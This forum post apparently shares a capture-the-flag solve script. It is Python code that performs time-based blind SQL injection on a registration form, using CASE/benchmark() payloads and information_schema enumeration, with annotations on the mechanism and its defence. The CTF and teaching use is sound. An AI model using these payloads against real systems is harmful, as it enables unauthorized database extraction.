借楼交流一下另一种解法
import requests
import time
# Time-based blind SQL injection solve script for a CTF registration form.
# One character of the target value is recovered per outer iteration: the
# "u" form field carries a CASE expression that answers quickly when the
# character's code point is greater than the guess and runs benchmark() when
# it is not, so the response time is the only signal that is read.
#
# NOTE(review): the page lost its indentation; the nesting below is a
# reconstruction and should be checked against the author's original.
#
# Defender's view: this only works if the "u" value reaches the SQL statement
# as text (presumably by string concatenation; the server code is not shown).
# Binding it as a query parameter removes the timing signal. What a log would
# show is benchmark(/sleep( inside a form field and registration requests
# that take seconds to complete.
i=1  # overwritten by the for loop below
n=2  # result of the previous probe: 1 = fast, 0 = slow; 2 matches neither branch
flag=""
for i in range(42,44):  # character positions 42 and 43 only
    print(i)
    m=64  # current guess for the character code
    j=64  # step size; halved before every probe after the first (32, 16, ... 1)
    for q in range(1,8):  # seven probes per character
        if q!=1:
            j=j/2
            # NOTE(review): placed under q!=1 so that the n left over from the
            # previous position does not shift the first probe; confirm.
            if n==1:
                m=m+j
            elif n==0:
                m=m-j
        m=int(m)  # j/2 is a float division, so m is converted back to int
        # Earlier stage, kept commented out: same probe against the table names
        # of the current database.
        #exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #flag
        # Earlier stage, kept commented out: same probe against the column names
        # of table 'flag'. The bare "#flag" lines are presumably the value each
        # stage returned.
        #exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #flag
        # Active probe: is ord(character i of flag.flag) > m ? True returns 1 at
        # once; false evaluates benchmark(5000000,sha(1)). /**/ stands where a
        # space would be (presumably because the form rejects spaces).
        exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
        # Form fields posted to register.php; "\x40" is "@".
        data={"e":"cop\x40qq.com",
        "u":exp,
        "p":"123456"
        }
        url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
        startTime=time.time()
        p=requests.post(url,data=data,timeout=100)  # response body is not inspected
        #print(p.status_code)
        print(m)
        #print(exp)
        #print(time.time()-startTime)
        # Under 2 seconds is read as "comparison true" (character code > m).
        if time.time()-startTime<2:
            n=1
        else:
            n=0
        if q==7:
            # Last probe (step 1): the character is m+1 if the code is above m,
            # otherwise m. The elapsed time is sampled again here rather than
            # reusing the reading taken just above.
            if time.time()-startTime<2:
                flag=flag+chr(m+1)
            else:
                flag=flag+chr(m)
    # NOTE(review): placed at outer-loop level (prints after each character);
    # the original nesting is not recoverable from the page.
    print(flag)